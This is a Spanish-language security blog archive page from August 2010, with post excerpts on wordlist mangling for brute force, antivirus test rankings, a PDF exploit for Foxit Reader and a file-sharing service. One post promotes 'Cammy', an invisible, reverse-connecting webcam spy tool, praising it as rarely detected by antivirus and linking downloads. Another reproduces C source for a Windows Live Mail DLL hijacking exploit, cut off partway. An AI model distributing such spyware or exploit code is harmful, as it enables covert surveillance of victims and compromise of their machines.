Entradas

Mostrando entradas de agosto 24, 2010

RSMangler – Multiplica tus diccionarios para hacer BruteForce

Imagen
Si para ti no es suficiente el Listado de Diccionarios para Realizar Ataques de Fuerza Bruta que publicamos hace poco o quieres realizar tu propio diccionario basandote en algunas palabras claves especificas, RSMangler es para ti.
RSMangler es un script desarrollado en Ruby por la compañía de seguridad RandomStorm (los mismos creadores del DVWA – Damn Vulnerable Web App), que tomando como base una lista de palabras y realizando sobre cada una varias manipulaciones logra obtener un diccionario mucho mas completo que el original, para utilizarlo en nuestras herramientas.

¿Cuáles son los mejores Antivirus para Windows 7? AV-Test – Agosto 2010

Imagen
AV-Test uno de los dos laboratorios independientes de análisis, pruebas, certificaciones y comparativas de Antivirus más reconocidos en la industria de la seguridad informática, ha emitido un informe certificando los mejores productos Antivirus para Windows 7.
AV-Test dividió los resultados en en 3 categorías: protección, reparación y usabilidad. Cada uno tiene una puntuación de 0 a 6,0 en incrementos de 0,5. Para lograr la certificación, un producto necesita un puntaje combinado de 12 o más. 13 de los 17 productos fueron certificados. Los resultados se basaron en pruebas realizadas durante abril, mayo y junio de este año, y por lo tanto no muestran resultados para las nuevas versiones 2011.

Cammy v1.9.0.1 Webcam Spy

Imagen
Cammy es una pequeña aplicacion que captura remotamente la imagen de la webcam o del escritorio remoto. Está diseñada para usar con otros programas de administración remota que no poseen captura de cámara.

Aunque es invisible, no tiene opciones de ocultacion ni autoinicio con windows, por lo que casi no es detectado por los antivirus, es de conexion inversa y bastante rapido.

En la imagen siguiente se ve al programa capturando la imagen de una webcam virtual

Ideal para principiantes, o para usar con otro RAT. Al igual que otros programas de conexion inversa funciona con un servidor y un cliente.

Descarga:
Cammy v1.9.0.1 (rapidshare)
Cammy v1.9.0.1 (megaupload)
Cammy v1.9.0.1 (badongo)

Antivirus Certificados

Imagen
AV-Test.org es uno de los proveedores líder en el mundo en escenarios de prueba, de análisis, de eficacia, del comportamiento y la velocidad de soluciones de seguridad.
Está formado por 17 empleados que tienen más de 15 años de experiencia en el ámbito de la investigación anti-virus y en seguridad de datos.
Ellos han analizado 19 antivirus y aplicaciones de seguridad bajo sus propios estándares de calidad:

Protección: Detección dinámica y estática de malwares.Reparación: desinfección del sistema y eliminación de rootkits. Usabilidad: cantidad de veces que las herramientas da falsos positivos alentando sistema.  Obteniendo los resultados adjuntos en esta tabla:

Producto

Reporte 

CertificadoPuntaje: 0.0 (Peor) a 6.0 (Mejor)Protección Reparar Usabilidad Avast: Internet Security 5.0102255si3.54.05.0AVG: Internet Security 9.0102253si5.54.05.0Avira: Premium Security Suite 10.0102247si4.05.54.0BitDefender: Internet Security Suite 2010102274si4.54.05.5BullGuard: Internet Security 9.0102276no3.5

Windows Live Email DLL Hijacking Exploit (dwmapi.dll)

Imagen
EDB-ID: 14728 CVE: N/A OSVDB-ID: N/A Author: Nicolas Krassas Published: 2010-08-24 Verified: Exploit Code:   Vulnerable App:    N/A /*
Exploit Title: Windows Live Email DLL Hijacking Exploit ( dwmapi.dll )
Date: 24/08/2010
Author: Nicolas Krassas
http://twitter.com/Dinosn
Version: Latest windows live suite
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .eml .nws .rss
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFram…

CVE-2010-1797 PDF exploit para Foxit Reader <= 4.0

Imagen
Este artículo es la traducción realizada por mí del escrito por jesparza en su blog (http://eternal-todo.com/blog/CVE-2010-1797-foxit-reader-exploit).Luego de la explicación de la vulnerabilidad Jailbreakme PDF, se publica la demostracion del concepto de la misma vulnerabilidad pero en este caso para la aplicación Foxit Reader. Esta vulnerabilidad ya ha sido parcheada pero se cree que no habrá ningún problema con la misma.Nosotros podemos usar un shell code de 116-bytes sin la necesidad de la explotación de otra etapa. En este caso se ha modificado la caluladora y se ha incluído el shell code en la versión modificada. Esta es la versión de calc.exe con el shell code para este PoC.Este exploit genera un PDF que puede ser abierto por Foxit Reader en Windows XP y Windows Vista. Sólo funciona en las últimas versiones de Foxit Reader pero es muy fácil de modificar para otras versiones(este es un ejemplo para la versión 3.0). Se puede encontrar el script codificado en python en la sección d…

Dushare: Transferencia directa de archivos de tamaño ilimitado por medio de una conexión P2P

Imagen
La transferencia de archivos suele ser un problema, muchas veces por las limitaciones de capacidad, que obligan a particionar un archivo, o directamente el conflicto surge al momento de elegir y utilizar algún modo de compartir el archivo, como los servicios de hosting estilo Rapidshare o Mediafire.Sea cual sea el inconveniente, una forma muy práctica, sencilla y rápida de compartir un archivo con otro usuario es Dushare, un servicio online y gratuito que nos permite realizar una transferencia directa de cualquier archivo, sin limitación de tamaño, generando una conexión P2Pentre el emisor y el receptor.Dushare es extremadamente fácil de usar. Primero tenemos que seleccionar el archivo que queremos compartir, para que se genere un enlace que tendremos que copiar y enviar por cualquier medio al usuario receptor. Para tener mayor seguridad, podemos asignarle una contraseña al enlace, lo cual nos puede ser útil si vamos a compartir dicho enlace en un sitio público como es el Muro de Face…